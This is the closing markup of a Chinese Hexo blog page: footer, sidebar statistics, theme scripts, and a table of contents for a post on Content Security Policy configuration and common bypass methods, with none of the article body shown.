    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">blackj liuyun</p>
              <p class="site-description motion-element" itemprop="description">纯净水@流云-自留地</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives">
              
                  <span class="site-state-item-count">12</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                <a href="/categories/index.html">
                  <span class="site-state-item-count">9</span>
                  <span class="site-state-item-name">分类</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">12</span>
                  <span class="site-state-item-name">标签</span>
                </a>
              </div>
            

          </nav>

          

          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#内容安全策略-CSP"><span class="nav-number">1.</span> <span class="nav-text">内容安全策略 CSP</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#功能效果"><span class="nav-number">1.0.0.1.</span> <span class="nav-text">功能效果</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#CSP和同源策略"><span class="nav-number">1.0.0.1.1.</span> <span class="nav-text">CSP和同源策略</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#使用方式："><span class="nav-number">1.0.0.1.2.</span> <span class="nav-text">使用方式：</span></a><ol class="nav-child"><li class="nav-item nav-level-6"><a class="nav-link" href="#要素"><span class="nav-number">1.0.0.1.2.1.</span> <span class="nav-text">要素</span></a></li></ol></li><li class="nav-item nav-level-5"><a class="nav-link" href="#http-header"><span class="nav-number">1.0.0.1.3.</span> <span class="nav-text">http header</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#html中通过meta来限制"><span class="nav-number">1.0.0.1.4.</span> <span class="nav-text">html中通过meta来限制</span></a></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#构建一下csp-来个例子"><span class="nav-number">1.0.0.2.</span> <span class="nav-text">构建一下csp 来个例子</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#配置"><span class="nav-number">1.0.0.2.1.</span> <span class="nav-text">配置</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#常见绕过方式"><span class="nav-number">1.0.0.2.2.</span> <span class="nav-text">常见绕过方式</span></a><ol class="nav-child"><li class="nav-item nav-level-6"><a class="nav-link" href="#1-文件上传绕过-只允许加载当前域"><span class="nav-number">1.0.0.2.2.1.</span> <span class="nav-text">1 文件上传绕过  只允许加载当前域</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#2、预加载-标签rel属性-绕过只允许加载当前域"><span class="nav-number">1.0.0.2.2.2.</span> <span class="nav-text">2、预加载 标签rel属性 绕过只允许加载当前域</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#3-url跳转"><span class="nav-number">1.0.0.2.2.3.</span> <span class="nav-text">3 url跳转</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#4-利用浏览器补全"><span class="nav-number">1.0.0.2.2.4.</span> <span class="nav-text">4 利用浏览器补全</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#iframe"><span class="nav-number">1.0.0.2.2.5.</span> <span class="nav-text">iframe</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#meta标签"><span class="nav-number">1.0.0.2.2.6.</span> <span class="nav-text">meta标签</span></a></li></ol></li><li class="nav-item nav-level-5"><a class="nav-link" href="#默认特性"><span class="nav-number">1.0.0.2.3.</span> <span class="nav-text">默认特性</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#防护问题："><span class="nav-number">1.0.0.2.4.</span> <span class="nav-text">防护问题：</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#参考："><span class="nav-number">1.0.0.2.5.</span> <span class="nav-text">参考：</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#存疑"><span class="nav-number">1.0.0.2.6.</span> <span class="nav-text">存疑</span></a></li></ol></li></ol></li></ol></li></ol></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2019</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">blackj liuyun</span>

  
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-area-chart"></i>
    </span>
    
      <span class="post-meta-item-text">Site words total count&#58;</span>
    
    <span title="Site words total count">21.6k</span>
  
</div>


  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Gemini</a> v5.1.4</div>




        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  


  











  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  

  
  
    <script type="text/javascript" src="/lib/canvas-nest/canvas-nest.min.js"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.4"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  





  

  

  

  
  

  

  

  

</body>
</html>
